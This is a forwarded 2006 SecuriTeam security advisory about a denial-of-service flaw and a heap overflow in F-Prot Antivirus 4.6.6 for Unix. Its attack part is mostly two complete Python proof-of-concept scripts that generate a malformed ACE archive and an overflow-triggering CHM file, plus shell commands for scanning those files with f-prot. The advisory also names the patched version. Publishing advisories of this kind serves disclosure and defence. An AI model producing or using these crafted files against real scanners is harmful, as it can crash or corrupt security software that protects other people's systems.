Thread-topic: [UNIX] F-Prot Antivirus Heap Overflow and DoS
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, December 07, 2006 6:28 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [UNIX] F-Prot Antivirus Heap Overflow and DoS
>
>
> F-Prot Antivirus Heap Overflow and DoS
>
>
>
> Two vulnerabilities in F-Prot Antivirus
> <
> l> 4.6.6 for Unix platforms could allow a remote attacker to
> cause a DoS or execute an arbitrary code.
>
>
> 1. ACE file Denial of Service When parsing a specially
> crafted ACE compressed file F-Prot Antivirus will enter in an
> infinite loop.
> See fprot1.py for more details.
>
> 2. CHM file heap overflow When parsing a specially crafted
> CHM file a heap overflow will occur in F-Prot Antivirus.
> See fprot2.py for more details.
>
> Vendor Status:
> Update to F-Prot version 4.6.7:
>
>
> Exploits:
> # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS
> #
> # Copyright (c) 2006 Evgeny Legerov
> #
> # Permission to use, copy, modify, and distribute this
> software for any
> # purpose with or without fee is hereby granted, provided
> that the above
> # copyright notice and this permission notice appear in all copies.
> #
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS
> ALL WARRANTIES
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR
> BE LIABLE FOR
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR
> ANY DAMAGES
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
> WHETHER IN AN
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
> ARISING OUT OF
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
> #
> # To test this code on Linux:
> #
> # create ACE compressed file
> # $ ./fprot1.py > 1.ace
> # $ f-prot 1.ace
>
> import sys
> import struct
>
> ACE="""
> 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14
> 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a
> 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52
> 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff
> 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00
> 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41
> 41 41 41 41 41
> """
>
> s = ""
> for i in [chr(int(i, 16)) for i in ACE.split(" ") if
> len(i.strip()) > 0]:
> s += i
>
> sys.stdout.write(s)
>
> # fprot2.py - trivial proof of concept code for F-Prot 4.6.6
> .CHM heap
> # overflow
> #
> # Copyright (c) 2006 Evgeny Legerov
> #
> # Permission to use, copy, modify, and distribute this
> software for any
> # purpose with or without fee is hereby granted, provided
> that the above
> # copyright notice and this permission notice appear in all copies.
> #
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS
> ALL WARRANTIES
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR
> BE LIABLE FOR
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR
> ANY DAMAGES
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
> WHETHER IN AN
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
> ARISING OUT OF
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
> #
> # $ ./fprot2.py > 1.chm
> # $ f-prot 1.chm
>
> import sys
> import struct
>
> s=""
> s+="ITSF" # signature
> s+=struct.pack("<L",3) # version
> s+=struct.pack("<L",96) # header_len
> s+=struct.pack("<L",1) # unknown
> s+=struct.pack("<L",0x41424344) # last_modified
> s+=struct.pack("<L",0x419) # lang_id
> s+="A"*16 #dir_clsid
> s+="B"*16 #stream_clsid
> s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset
> s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len
> s+=struct.pack("<L",120) + "\x00" *4 #dir_offset
> s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len
> s+=struct.pack("<L",4300) + "\x00"*4 #data_offset
> s+="A"*24
> s+="ITSP"
> s+=struct.pack("<L", 1) # version
> s+=struct.pack("<L",0x54) # header_len
> s+=struct.pack("<L", 0xa) # unknown
> s+=struct.pack("<L",1000) # block_len - BUG?
> s+=struct.pack("<L",2) # blockidx
> s+=struct.pack("<L", 1) # index_depth
> s+=struct.pack("<L", -1) # index_root
> s+=struct.pack("<L",0) # index_head
> s+=struct.pack("<L",0) # index_tail
> s+=struct.pack("<L", -1) # unknown2
> s+=struct.pack("<L",1) # num_blocks
> s+=struct.pack("<L", 1033) # lang_id
> s+="A"*32
> s+="B"*10000
>
> sys.stdout.write(s)
>
>
> Additional Information:
> The original article can be found at:
>
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
